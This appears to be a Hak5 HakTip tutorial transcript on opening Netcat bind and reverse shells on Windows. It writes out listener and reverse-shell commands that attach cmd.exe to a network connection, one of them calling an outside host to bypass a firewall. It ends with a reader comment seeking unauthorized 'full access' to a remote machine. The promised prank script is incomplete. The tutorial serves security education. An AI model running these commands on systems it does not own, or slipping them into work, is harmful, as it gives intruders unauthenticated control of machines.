Haktip 86 – Netcat 101: Remote Shells in Windows

This week on HakTip Shannon is creating remote shells with Netcat in Windows!



Welcome to HakTip — the show where we break down concepts, tools and techniques for hackers, gurus and IT ninjas. I’m Shannon Morse and today I’m creating remote shells with Netcat in Windows!
What is a remote shell? It’s a command-line session on another computer: the commands you type are executed over there, as whichever user started the shell, even if that machine sits on a different network. One side listens on a TCP port and attaches a shell (cmd.exe on Windows, /bin/sh on Linux) to whatever connects; the other side connects and types. This is where we get into a real world scenario. You can use a remote shell to target a computer for nefarious purposes, or to do real world good, like collecting log files or troubleshooting a box you can’t walk over to.
While I’m not going to show you how to get a victim to start a shell on their computer without their knowledge, I will show you how to do a legit remote shell for white hat use. Let’s go ahead and prepare the Windows machine for a remote shell. Open your command prompt and change to your Netcat directory. Type the following command:
* nc -Lp 31337 -vv -e cmd.exe
This starts Netcat as a listener. -L (capital L, a Windows-only option) puts it in persistent listening mode and -p 31337 is the port: when a connected client goes away, Netcat goes back to listening instead of exiting, so the port stays open until you kill the process. -vv tells Netcat to be extra verbose, which is useful for watching connections arrive and for file transfers, etc. -e cmd.exe opens the “gaping security hole” (that’s literally the name of the compile-time option that enables -e): as soon as a client connects, Netcat starts cmd.exe with its input and output wired to the connection, so whoever connected is typing straight into a command prompt on this machine. There is no password and no encryption on that port, which is why you only do this on a box you own.
Now, on my Linux machine I’m going to connect to the target computer with this command:
* nc <windows-ip> 31337
This opens Netcat and connects to my Windows machine (put its IP address or hostname where <windows-ip> is) on port 31337. Once it connects I can do things! I can type dir /w to see a directory listing on the Windows computer. I can make a new directory with md MyDirectory. Running dir /w again from the Linux PC shows the new directory, and I can confirm on the Windows machine itself that it’s really been created.
Netcat can also do this the other way around, as a reverse shell, which is handy when a firewall blocks inbound connections to the target but lets outbound web traffic through. On a server outside the firewall I start a listener on port 80 (for example nc -lp 80 -vv), then on the Windows machine I run: nc hak5.wifipineapple.com 80 -e cmd.exe. Now the Windows box dials out to the server and hands it a cmd.exe session, and I have a shell from the outside world. It’s an unencrypted tunnel, so everything typed and everything returned is visible on the wire. Easy!
Do you use Netcat? Send me a comment below or email us at [email protected]
And be sure to check out our sister show, Hak5 for more great stuff just like this. I’ll be there, reminding you to trust your technolust.


The HakShop is Hak5’s premier store for all of your pen testing needs, including one of my favorites – The USB Rubber Ducky – which looks like a flashdrive and types like a keyboard. It can type scripts into a computer ridiculously quickly… Like my new fav. from forum user N3W that reverses your mouse left and right buttons:
DELAY 4000
This is great for pranking your coworkers!
We couldn’t do this show without your support, so we’d like to thank you with something special:
Use coupon code “Snubs” with any order for your very own signed HakTip stickers. Thanks for supporting the show!

1 Comment

  • VK Infosec Consultant

    Hi there, I have a question. Let’s say netcat is already there on a remote machine (note: it’s not listening on any port). I have the only option to make it listen on some specific port from my browser only. So can you tell me how I can make it start listening, because technically, whenever you access that file remotely, the browser asks you to download it. But what I want is to run it on the target machine so that I can have full access to that remote machine.

    Thanks in advance & best regards
